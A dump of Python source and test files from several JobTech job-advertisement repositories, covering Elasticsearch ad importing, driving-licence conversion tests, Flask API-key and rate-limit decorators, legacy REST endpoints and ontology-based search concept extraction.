log.error(f"Index: {es_index} has: {num_doc_elastic} indexed documents. Exit!")
sys.exit(1)
def _load_and_process_ads(ad_ids, es_index, es_index_deleted):
doc_counter = 0
len_ads = len(ad_ids)
nr_of_items_per_batch = settings.PG_BATCH_SIZE
nr_of_items_per_batch = min(nr_of_items_per_batch, len_ads)
if nr_of_items_per_batch < 1:
log.error("Failed to retrieve any ads. Exit!")
sys.exit(1)
nr_of_batches = math.ceil(len_ads / nr_of_items_per_batch)
# Partition list into manageable chunks
ad_batches = grouper(nr_of_items_per_batch, ad_ids)
processed_ads_total = 0
for i, ad_batch in enumerate(ad_batches):
log.info('Processing batch %s/%s' % (i + 1, nr_of_batches))
# Fetch ads from LA to raw-list
ad_details = loader.bulk_fetch_ad_details(ad_batch)
raw_ads = [raw_ad for raw_ad in list(ad_details.values())
if not raw_ad.get('removed', False)]
doc_counter += len(raw_ads)
log.info(f'doc_counter=len(raw_ads): {doc_counter}')
log.debug(f'Fetched batch of ads (id, updatedAt): '
f'{", ".join(("(" + str(ad["annonsId"]) + ", " + str(ad["updatedAt"])) + ")" for ad in raw_ads)}')
_convert_and_save_to_elastic(ad_details.values(), es_index, es_index_deleted)
processed_ads_total = processed_ads_total + len(ad_batch)
log.info(f'Processed ads: {processed_ads_total}/{len_ads}')
return doc_counter
def _convert_and_save_to_elastic(raw_ads, es_index, deleted_index):
# Loop over raw-list, convert and enrich into cooked-list
log.info(f"Converting: {len(raw_ads)} ads to proper format ...")
converted_ads = [converter.convert_ad(raw_ad) for raw_ad in raw_ads]
log.info("Enriching ads with ML ...")
enriched_ads = enricher.enrich(converted_ads)
if settings.SAVE_ENRICHED_ADS:
global enriched_ads_to_save
enriched_ads_to_save.extend(enriched_ads)
log.info(f"Indexing: {len(enriched_ads)} enriched documents into: {es_index}")
# Bulk save cooked-list to elastic
num_indexed = elastic.bulk_index(enriched_ads, es_index, deleted_index)
return num_indexed
def _find_missing_ids_and_create_loadinglist(ad_ids, es_index):
id_lookup = {str(a['annonsId']): a for a in ad_ids if not a['avpublicerad']}
loaded_ids = [str(a['annonsId']) for a in ad_ids if not a['avpublicerad']]
missing_ids = elastic.find_missing_ad_ids(loaded_ids, es_index)
return [id_lookup[missing_id] for missing_id in missing_ids]
def start_daily_index():
new_index_name = "%s-%s" % (settings.ES_ANNONS_PREFIX, datetime.now().strftime('%Y%m%d-%H%M'))
log.info(f"Start creating new daily index: {new_index_name}")
log.info(f"Using taxonomy index: {elastic.get_index_name_for_alias(importers.settings.ES_TAX_INDEX_ALIAS)}")
start(new_index_name)
set_platsannons_read_alias(new_index_name)
set_platsannons_write_alias(new_index_name)
log.info(f"Switching alias to new index completed successfully: {new_index_name}")
if __name__ == '__main__':
configure_logging([__name__, 'importers'])
log = logging.getLogger(__name__)
start_daily_index()
```
#### File: tests/integration_tests/test_drivers_license.py
```python
import pytest
from importers.platsannons import converter
drivers_licenses_test_data = [
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'C1', 'varde': 'swP6_psb_FCB'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'swP6_psb_FCB', 'legacy_ams_taxonomy_id': '12', 'label': 'C1'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'D', 'varde': 'hK1a_wsQ_4UG'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'hK1a_wsQ_4UG', 'legacy_ams_taxonomy_id': '5', 'label': 'D'}]},
{'input': {'korkort': [{'namn': 'AM', 'varde': '4HpY_e2U_TUH'}]},
'expected': [{'concept_id': '4HpY_e2U_TUH', 'legacy_ams_taxonomy_id': '16', 'label': 'AM'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': '<NAME>', 'varde': 'ftCQ_gFu_L4b'},
{'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}, {'namn': 'C1', 'varde': 'swP6_psb_FCB'},
{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'ftCQ_gFu_L4b', 'legacy_ams_taxonomy_id': '18', 'label': 'Utökad B'},
{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'},
{'concept_id': 'swP6_psb_FCB', 'legacy_ams_taxonomy_id': '12', 'label': 'C1'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
{'input': {'korkort': [{'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}, {'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'}]},
'expected': [{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'},
{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'C', 'varde': 'BKCx_hST_Pcm'},
{'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'},
{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'AM', 'varde': '4HpY_e2U_TUH'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': '4HpY_e2U_TUH', 'legacy_ams_taxonomy_id': '16', 'label': 'AM'}]},
{'input': {'korkort': [{'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'}]},
'expected': [{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'}]},
{'input': {'korkort': [{'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}, {'namn': 'B', 'varde': 'VTK8_WRx_GcM'}]},
'expected': [{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'},
{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'}]},
{'input': {'korkort': [{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
{'input': {'korkort': [{'namn': 'C1', 'varde': 'swP6_psb_FCB'}]},
'expected': [{'concept_id': 'swP6_psb_FCB', 'legacy_ams_taxonomy_id': '12', 'label': 'C1'}]},
{'input': {'korkort': [{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}, {'namn': 'B', 'varde': 'VTK8_WRx_GcM'}]},
'expected': [{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'},
{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'},
{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
{'input': {'korkort': [{'namn': '<NAME>', 'varde': 'ftCQ_gFu_L4b'}]},
'expected': [{'concept_id': 'ftCQ_gFu_L4b', 'legacy_ams_taxonomy_id': '18', 'label': 'Utökad B'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'}]},
{'input': {'korkort': [{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}, {'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'}]},
'expected': [{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'},
{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'}]},
{'input': {'korkort': [{'namn': 'A', 'varde': 'hK8X_cX9_5P4'}]},
'expected': [{'concept_id': 'hK8X_cX9_5P4', 'legacy_ams_taxonomy_id': '10', 'label': 'A'}]},
{'input': {'korkort': [{'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}]},
'expected': [{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': '<NAME>', 'varde': 'ftCQ_gFu_L4b'},
{'namn': 'C1', 'varde': 'swP6_psb_FCB'}, {'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'ftCQ_gFu_L4b', 'legacy_ams_taxonomy_id': '18', 'label': 'Utökad B'},
{'concept_id': 'swP6_psb_FCB', 'legacy_ams_taxonomy_id': '12', 'label': 'C1'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
]
@pytest.mark.parametrize("test_case", drivers_licenses_test_data)
def test_drivers_license(test_case):
converted = converter.parse_driving_licence(test_case['input'])
assert converted == test_case['expected']
```
#### File: integration_tests/test_resources/original_value.py
```python
def get_original_value(my_list):
for item in my_list:
if item['original_value']:
return item
return False
```
#### File: tests/utils/unspecified_city_and_remote.py
```python
import datetime
import pathlib
import glob
import json
files_with_path = pathlib.Path.cwd() / "*historical*.json"
def open_file(file_name):
with open(file_name, 'r') as f:
list_of_ads_from_file = json.load(f)
return list_of_ads_from_file
def file_list(pattern):
json_files = glob.glob(str(pattern))
json_files.sort()
return json_files
def current_year():
return datetime.datetime.now().year
def year_from_file(file):
year = file[-11:-7]
return year
def start():
json_files = file_list(files_with_path)
all_results = []
for y in range(2006, current_year()):
# select files from for year y
files_for_this_year = []
for f in json_files:
file_year = year_from_file(f)
if str(y) == file_year:
files_for_this_year.append(f)
total_no_city = 0
total_has_city = 0
total_remote = 0
total = 0
for file in files_for_this_year:
list_of_ads_from_file = open_file(file)
no_city_tmp = 0
has_city_tmp = 0
remote_tmp = 0
total_tmp = 0
for ad in list_of_ads_from_file:
if ad.get('workplace_address', {}).get('city') or ad.get('workplace_address', {}).get('municipality'):
has_city_tmp += 1
else:
no_city_tmp += 1
if ad.get('remote_work', None):
remote_tmp += 1
total_tmp = len(list_of_ads_from_file)
total_no_city += no_city_tmp
total_has_city += has_city_tmp
total_remote += remote_tmp
total += total_tmp
year_result = f"{y}, {total} , {total_no_city}, {total_has_city}, {total_remote}"
all_results.append(year_result)
with open(f"results.csv", mode="w") as f:
header = f"year, total, no city, city, remote "
f.write(f"{header}\n")
for r in all_results:
f.write(f"{r}\n")
if __name__ == '__main__':
"""
Input:
json files converted by the convert-historical function in elastic-importers
These files are expected to be in the same directory as this program, and follow this naming convention: "*historical*.json"
The output of this program is a .csv file with the results grouped per year
"""
start()
``` |
{
"source": "JobtechSwe/jobtech-common",
"score": 2
} |
#### File: common/rest/decorators.py
```python
import logging
import base64
import binascii
import re
import json
from flask import request
from flask_restx import abort
from pymemcache.client import base
from jobtech.common import settings
from jobtech.common.repository import elastic
log = logging.getLogger(__name__)
EMAIL_REGEX = re.compile(r"\"?([-a-zA-Z0-9.`?{}]+@\w+\.\w+)\"?")
def json_serializer(key, value):
if type(value) == str:
return value, 1
return json.dumps(value), 2
def json_deserializer(key, value, flags):
if flags == 0:
return None
if flags == 1:
return value.decode('utf-8')
if flags == 2:
return json.loads(value.decode('utf-8'))
raise Exception("Unknown serialization format")
memcache = base.Client(('localhost', 11211),
serializer=json_serializer,
deserializer=json_deserializer, ignore_exc=True)
def check_api_key_simple(func):
def wrapper(*args, **kwargs):
apikey = request.headers.get(settings.APIKEY)
decoded_key = _decode_key(apikey)
if EMAIL_REGEX.match(decoded_key):
log.debug("API key %s is valid." % decoded_key)
return func(*args, **kwargs)
log.info("Failed validation for key '%s'" % decoded_key)
abort(401, message="You're no monkey!")
return wrapper
def check_api_key(api_identifier, rate_limit=None):
def real_check_api_key_decorator(func):
def wrapper(*args, **kwargs):
memcache_key = "valid_api_keys_%s" % api_identifier
valid_api_dict = memcache.get(memcache_key)
if not valid_api_dict:
log.debug("Reloading API keys for api id: %s" % api_identifier)
new_keys = elastic.get_source(index=settings.ES_SYSTEM_INDEX,
id=api_identifier, ignore=404)
if new_keys:
log.debug("Updating API keys from ES: %s" % new_keys)
valid_api_dict = new_keys
try:
memcache.set(memcache_key, valid_api_dict, 60)
except ConnectionRefusedError:
log.debug(
"Memcache not available, reloading keys for " +
"each request.")
apikey = request.headers.get(settings.APIKEY)
memcache_rate_key = "rate_limit_%s_%s_%s" % \
(api_identifier, apikey, rate_limit)
if apikey in valid_api_dict:
if rate_limit and memcache.get(memcache_rate_key):
abort(429,
message='Rate limit is one request per %d seconds.'
% rate_limit)
if rate_limit:
try:
memcache.set(memcache_rate_key, True, rate_limit)
except ConnectionRefusedError:
log.debug("Memcache not available, unable to set rate limit.")
log.debug("API key: %s is valid for application: %s (ID: %s)"
% (apikey,
valid_api_dict[apikey].get('app'),
valid_api_dict[apikey].get('id')))
return func(*args, **kwargs)
log.info("Failed validation for key '%s'" % apikey)
abort(401, message="Missing or invalid API key")
return wrapper
return real_check_api_key_decorator
def check_api_key_and_return_metadata(api_identifier, rate_limit=None):
def real_check_api_key_metadata_decorator(func):
def wrapper(*args, **kwargs):
memcache_key = "valid_api_keys_%s" % api_identifier
valid_api_dict = memcache.get(memcache_key)
log.debug("Memcache key: %s" % valid_api_dict)
if not valid_api_dict:
log.debug("Reloading API keys for api id: %s" % api_identifier)
new_keys = elastic.get_source(index=settings.ES_SYSTEM_INDEX,
id=api_identifier, ignore=404)
if new_keys:
log.debug("Updating API keys from ES: %s" % new_keys)
valid_api_dict = new_keys
try:
memcache.set(memcache_key, valid_api_dict, 60)
except ConnectionRefusedError:
log.debug("Memcache not available, reloading keys for each request.")
apikey = request.headers.get(settings.APIKEY)
memcache_rate_key = "rate_limit_%s_%s_%s" % \
(api_identifier, apikey, rate_limit)
if apikey in valid_api_dict:
if rate_limit and memcache.get(memcache_rate_key):
abort(429,
message='Rate limit is one request per %d seconds.'
% rate_limit)
if rate_limit:
try:
memcache.set(memcache_rate_key, True, rate_limit)
except ConnectionRefusedError:
log.debug("Memcache not available, unable to set rate limit.")
kwargs['key_id'] = apikey
kwargs['key_app'] = valid_api_dict[apikey].get('app')
log.debug("API key: %s is valid for application: %s (ID: %s)"
% (apikey,
valid_api_dict[apikey].get('app'),
valid_api_dict[apikey].get('id')))
return func(*args, **kwargs)
log.info("Failed validation for key '%s'" % apikey)
abort(401, message="Missing or invalid API key")
return wrapper
return real_check_api_key_metadata_decorator
# Decodes the API which is in base64 format
def _decode_key(apikey):
decoded = apikey if apikey is not None else 'Invalid Key: None'
if apikey:
for i in range(3):
try:
decoded = base64.urlsafe_b64decode(apikey).decode('utf-8').strip()
break
except binascii.Error as e:
log.debug("Failed to decode api key: %s: %s" % (apikey, e))
pass
except UnicodeDecodeError as u:
log.debug("Failed to decode utf-8 key: %s: %s" % (apikey, u))
decoded = 'Invalid Key' # Prevents users from sending plain email adress
# Reappend trailing '=' to find correct padding
apikey = "%s=" % apikey
return decoded
```
#### File: tests/unit_tests/test_api_key.py
```python
import os
import pytest
import base64
from flask import Flask
from werkzeug.exceptions import Unauthorized
from werkzeug.datastructures import Headers
import sys
from jobtech.common import settings
from jobtech.common.rest.decorators import check_api_key_simple
app = Flask('mytestapplication')
@pytest.mark.unit
def test_check_api_key_no_key():
print('==================', sys._getframe().f_code.co_name, '===================== ')
with app.test_request_context():
@check_api_key_simple
def function_to_test():
print('This line should never be printed since user has no valid API key')
with pytest.raises(Unauthorized):
function_to_test()
@pytest.mark.unit
def test_check_api_key_valid():
print('==================', sys._getframe().f_code.co_name, '===================== ')
encoded_key = base64.b64encode('<EMAIL>'.encode("utf-8"))
d = Headers()
d.add(settings.APIKEY, encoded_key)
with app.test_request_context(headers=d):
@check_api_key_simple
def valid_key_function_to_test():
print('This line should be printed since user has a valid API key')
return True
assert valid_key_function_to_test() is True
@pytest.mark.unit
def test_check_api_key_not_valid():
print('==================', sys._getframe().f_code.co_name, '===================== ')
encoded_key = base64.b64encode('not_a_valid_email_address'.encode("utf-8"))
d = Headers()
d.add(settings.APIKEY, encoded_key)
with app.test_request_context(headers=d):
@check_api_key_simple
def non_valid_key_function_to_test():
print('This line should not be printed since user doesnt have a '
'valid API key')
with pytest.raises(Unauthorized):
non_valid_key_function_to_test()
@pytest.mark.unit
def test_check_api_key_not_valid_and_base64():
print('==================', sys._getframe().f_code.co_name, '===================== ')
d = Headers()
d.add(settings.APIKEY, '<EMAIL>')
with app.test_request_context(headers=d):
@check_api_key_simple
def non_base64_key_function_to_test():
print('This line should not be printed since user doesnt have a '
'base64-encoded API key')
with pytest.raises(Unauthorized):
non_base64_key_function_to_test()
if __name__ == '__main__':
pytest.main([os.path.realpath(__file__), '-svv', '-ra', '-m unit'])
``` |
{
"source": "JobtechSwe/legacy-api-af",
"score": 2
} |
#### File: legacy/rest/endpoints.py
```python
import logging
from flask import request
from flask_restplus import Resource, abort
from legacy.rest import (ns_legacy, kommunlista_query, yrkesgrupp_query, yrkes_query,
legacy_query)
from legacy import repository
from legacy.rest import model
log = logging.getLogger(__name__)
@ns_legacy.route('soklista/lan')
class SoklistaLan(Resource):
def get(self):
return repository.lista_lan()
@ns_legacy.route('soklista/lan2')
class SoklistaLan2(Resource):
def get(self):
return repository.lista_lan2()
@ns_legacy.route('soklista/kommuner')
class SoklistaKommuner(Resource):
@ns_legacy.expect(kommunlista_query)
def get(self):
args = kommunlista_query.parse_args()
return repository.lista_kommuner(args['lanid'])
@ns_legacy.route('soklista/yrkesomraden')
class SoklistaYrkesomraden(Resource):
def get(self):
return repository.lista_yrkesomraden()
@ns_legacy.route('soklista/yrkesgrupper')
class SoklistaYrkesgrupper(Resource):
@ns_legacy.expect(yrkesgrupp_query)
def get(self):
args = yrkesgrupp_query.parse_args()
return repository.lista_yrkesgrupper(args['yrkesomradeid'])
@ns_legacy.route('soklista/yrken')
class SoklistaYrken(Resource):
@ns_legacy.expect(yrkes_query)
def get(self):
args = yrkes_query.parse_args()
return repository.lista_yrken(args['yrkesgruppid'])
@ns_legacy.route('soklista/yrken/<benamning>')
class SoklistaYrkenPath(Resource):
def get(self, benamning):
return repository.lista_yrken_by_string(benamning)
@ns_legacy.route('matchning')
class Matchning(Resource):
@ns_legacy.expect(legacy_query)
@ns_legacy.marshal_with(model.matchningslista)
def get(self):
args = legacy_query.parse_args()
sida = args.pop('sida')
rader = args.pop('antalrader')
if sida == 0:
sida = 1
if sida < 1:
abort(400, "Parametern sida måste vara större än noll.")
if not any(v is not None for v in args.values()):
abort(400, "Minst en av sökparametrarna nyckelord, kommunid, yrkesid, "
"organisationsnummer, yrkesgruppid, varaktighetid, yrkesomradeid, "
"landid, lanid, anstallningstyp eller omradeid måste vara satta")
results = repository.matcha(args, sida, rader)
return results
@ns_legacy.route('<platsannonsid>')
class ShowPlatsannons(Resource):
@ns_legacy.marshal_with(model.platsannons)
def get(self, platsannonsid):
r = repository.fetch_platsannons(platsannonsid)
return r
@ns_legacy.route('<platsannonsid>/logotyp')
class ShowPlatsannonsLogotyp(Resource):
def get(self, platsannonsid):
log.debug("Showing logo %s" % platsannonsid)
return repository.fetch_platsannons_logo(platsannonsid)
@ns_legacy.route('version')
class ShowVersion(Resource):
def get(self):
if request.headers['Accept'] in ['*/*', 'text/plain']:
return "version: 1.1.0"
else:
return {"platsannonser": {"version": "1.1.0"}}
``` |
{
"source": "JobtechSwe/sokannonser-api",
"score": 3
} |
#### File: sokannonser-api/common/helpers.py
```python
import time
def calculate_utc_offset():
is_dst = time.daylight and time.localtime().tm_isdst > 0
utc_offset = - (time.altzone if is_dst else time.timezone)
return int(utc_offset / 3600) if utc_offset > 0 else 0
```
#### File: sokannonser/repository/text_to_concept.py
```python
import logging
import time
from common import settings
from sokannonser.repository.ontology import Ontology
from common.elastic_connection_with_retries import create_elastic_client_with_retry
from sokannonser.repository.helpers import clean_plus_minus
log = logging.getLogger(__name__)
OP_NONE = ''
OP_PLUS = '+'
OP_MINUS = '-'
class TextToConcept(object):
COMPETENCE_KEY = 'KOMPETENS'
OCCUPATION_KEY = 'YRKE'
TRAIT_KEY = 'FORMAGA'
LOCATION_KEY = 'GEO'
REMOVED_TAG = '<removed>'
def __init__(self, ontologyhost='127.0.0.1', ontologyport=9200,
ontologyindex=settings.ONTOLOGY_INDEX, ontologyuser=None, ontologypwd=None):
log.info("Creating Ontology elastic client")
self.client = create_elastic_client_with_retry(ontologyhost, ontologyport, ontologyuser, ontologypwd)
self.ontologyindex = ontologyindex
self.ontology = None
if not settings.DELAY_ONTOLOGY_STARTUP:
self.get_ontology()
def get_ontology(self):
if self.ontology is None:
start_time = int(time.time() * 1000)
log.info(f'Creating Ontology, ontologyindex: {self.ontologyindex}')
self.ontology = Ontology(client=self.client,
index=self.ontologyindex,
annons_index=settings.ES_INDEX,
concept_type=None,
include_misspelled=True)
log.info(f"Ontology created after: {int(time.time() * 1000 - start_time)} ms")
return self.ontology
def text_to_concepts(self, text):
# Note: Remove eventual '+' and '-' in every freetext query word since flashText is
# configured so it can't find words starting with minus/hyphen.
search_text = clean_plus_minus(text)
text_lower = text.lower()
ontology_concepts_orig = self.get_ontology().get_concepts(search_text, concept_type=None, span_info=True)
ontology_concepts = [c[0] for c in ontology_concepts_orig]
log.debug(f'Text: {text} ontology_concepts: {ontology_concepts}')
text_lower_plus_blank_end = text_lower + ' '
for concept in ontology_concepts:
concept_term = concept['term']
negative_concept_term = '-' + concept_term + ' '
if ' ' + negative_concept_term in text_lower_plus_blank_end or \
text_lower_plus_blank_end.startswith(negative_concept_term):
concept['operator'] = OP_MINUS
elif '+' + concept_term + ' ' in text_lower_plus_blank_end:
concept['operator'] = OP_PLUS
else:
concept['operator'] = OP_NONE
skills = [c for c in ontology_concepts if self.filter_concepts(c, self.COMPETENCE_KEY, OP_NONE)]
occupations = [c for c in ontology_concepts if self.filter_concepts(c, self.OCCUPATION_KEY, OP_NONE)]
traits = [c for c in ontology_concepts if self.filter_concepts(c, self.TRAIT_KEY, OP_NONE)]
locations = [c for c in ontology_concepts if self.filter_concepts(c, self.LOCATION_KEY, OP_NONE)]
skills_must = [c for c in ontology_concepts if self.filter_concepts(c, self.COMPETENCE_KEY, OP_PLUS)]
occupations_must = [c for c in ontology_concepts if self.filter_concepts(c, self.OCCUPATION_KEY, OP_PLUS)]
traits_must = [c for c in ontology_concepts if self.filter_concepts(c, self.TRAIT_KEY, OP_PLUS)]
locations_must = [c for c in ontology_concepts if self.filter_concepts(c, self.LOCATION_KEY, OP_PLUS)]
skills_must_not = [c for c in ontology_concepts if self.filter_concepts(c, self.COMPETENCE_KEY, OP_MINUS)]
occupations_must_not = [c for c in ontology_concepts if self.filter_concepts(c, self.OCCUPATION_KEY, OP_MINUS)]
traits_must_not = [c for c in ontology_concepts if self.filter_concepts(c, self.TRAIT_KEY, OP_MINUS)]
locations_must_not = [c for c in ontology_concepts if self.filter_concepts(c, self.LOCATION_KEY, OP_MINUS)]
result = {'skill': skills,
'occupation': occupations,
'trait': traits,
'location': locations,
'skill_must': skills_must,
'occupation_must': occupations_must,
'trait_must': traits_must,
'location_must': locations_must,
'skill_must_not': skills_must_not,
'occupation_must_not': occupations_must_not,
'trait_must_not': traits_must_not,
'location_must_not': locations_must_not}
return result
@staticmethod
def filter_concepts(concept, concept_type, operator):
return concept['type'] == concept_type and concept['operator'] == operator
```
#### File: sokannonser/repository/valuestore.py
```python
import logging
import json
from common import settings, fields, fields as f, taxonomy
from common.main_elastic_client import elastic_client
from common.elastic_connection_with_retries import elastic_search_with_retry
from common.taxonomy import tax_type, annons_key_to_jobtech_taxonomy_key
log = logging.getLogger(__name__)
taxonomy_cache = {}
reverse_tax_type = {item[1]: item[0] for item in tax_type.items()}
def _build_query(query_string, taxonomy_code, entity_type, offset, limit):
musts = []
sort = None
if query_string:
musts.append({"bool": {"should": [
{
"match_phrase_prefix": {
"label": {
"query": query_string
}
}
},
{
"term": {
"concept_id": {"value": query_string}
}
},
{
"term": {
"legacy_ams_taxonomy_id": {"value": query_string}
}
}
]}})
else:
# Sort numerically for non-query_string-queries
sort = [
{
"legacy_ams_taxonomy_num_id": {"order": "asc"}
}
]
if taxonomy_code:
if not isinstance(taxonomy_code, list):
taxonomy_code = [taxonomy_code]
terms = [{"term": {"parent.legacy_ams_taxonomy_id": t}} for t in taxonomy_code]
terms += [{"term": {"parent.concept_id.keyword": t}} for t in taxonomy_code]
terms += [{"term":
{"parent.parent.legacy_ams_taxonomy_id": t}
} for t in taxonomy_code]
terms += [{"term":
{"parent.parent.concept_id.keyword": t}
} for t in taxonomy_code]
parent_or_grandparent = {"bool": {"should": terms}}
# musts.append({"term": {"parent.id": taxonomy_code}})
musts.append(parent_or_grandparent)
if entity_type:
musts.append({"bool": {"should": [{"term": {"type": et}} for et in entity_type]}})
# musts.append({"term": {"type": entity_type}})
if not musts:
query_dsl = {"query": {"match_all": {}}, "from": offset, "size": limit}
else:
query_dsl = {
"query": {
"bool": {
"must": musts
}
},
"from": offset,
"size": limit
}
if sort:
query_dsl['sort'] = sort
query_dsl['track_total_hits'] = True
return query_dsl
def find_concept_by_legacy_ams_taxonomy_id(elastic_client, taxonomy_type, legacy_ams_taxonomy_id,
not_found_response=None):
query = {
"query": {
"bool": {
"must": [
{"term": {"legacy_ams_taxonomy_id": {
"value": legacy_ams_taxonomy_id}}},
{"term": {
"type": {
"value": annons_key_to_jobtech_taxonomy_key.get(taxonomy_type, '')
}
}}
]
}
}
}
elastic_response = elastic_search_with_retry(elastic_client, query, settings.ES_TAX_INDEX_ALIAS)
hits = elastic_response.get('hits', {}).get('hits', [])
if not hits:
log.warning(f"No taxonomy entity found for type: {taxonomy_type} and legacy id: {legacy_ams_taxonomy_id}")
return not_found_response
return hits[0]['_source']
def find_concepts(elastic_client, query_string=None, taxonomy_code=[], entity_type=[], offset=0, limit=10):
query_dsl = _build_query(query_string, taxonomy_code, entity_type, offset, limit)
log.debug(f"Query: {json.dumps(query_dsl)}")
elastic_response = elastic_search_with_retry(client=elastic_client, query=query_dsl,
index=settings.ES_TAX_INDEX_ALIAS)
log.debug(
f"(find_concepts) took: {elastic_response.get('took', '')}, timed_out: {elastic_response.get('timed_out', '')}")
if elastic_response:
return elastic_response
else:
log.error(f"Failed to query Elasticsearch, query: {query_dsl} index: {settings.ES_TAX_INDEX_ALIAS}")
return None
def get_stats_for(taxonomy_type):
value_path = {
taxonomy.OCCUPATION: "%s.%s.keyword" %
(fields.OCCUPATION, fields.LEGACY_AMS_TAXONOMY_ID),
taxonomy.GROUP: "%s.%s.keyword" % (
fields.OCCUPATION_GROUP, fields.LEGACY_AMS_TAXONOMY_ID),
taxonomy.FIELD: "%s.%s.keyword" % (
fields.OCCUPATION_FIELD, fields.LEGACY_AMS_TAXONOMY_ID),
taxonomy.SKILL: "%s.%s.keyword" % (fields.MUST_HAVE_SKILLS,
fields.LEGACY_AMS_TAXONOMY_ID),
taxonomy.MUNICIPALITY: "%s" % fields.WORKPLACE_ADDRESS_MUNICIPALITY_CODE,
taxonomy.REGION: "%s" % fields.WORKPLACE_ADDRESS_REGION_CODE
}
# Make sure we don't crash if we want to stat on missing type
for tt in taxonomy_type:
if tt not in value_path:
log.warning(f"Taxonomy type: {taxonomy_type} not configured for aggs.")
return {}
aggs_query = {
"from": 0, "size": 0,
"query": {
"bool": {
"must": [{"match_all": {}}],
'filter': [
{
'range': {
fields.PUBLICATION_DATE: {
'lte': 'now/m'
}
}
},
{
'range': {
fields.LAST_PUBLICATION_DATE: {
'gte': 'now/m'
}
}
},
{
'term': {
fields.REMOVED: False
}
},
]
}
},
"aggs": {
"antal_annonser": {
"terms": {"field": value_path[taxonomy_type[0]], "size": 5000},
}
}
}
log.debug(f'(get_stats_for) aggs_query: {json.dumps(aggs_query)}')
aggs_result = elastic_search_with_retry(elastic_client(), aggs_query, settings.ES_INDEX)
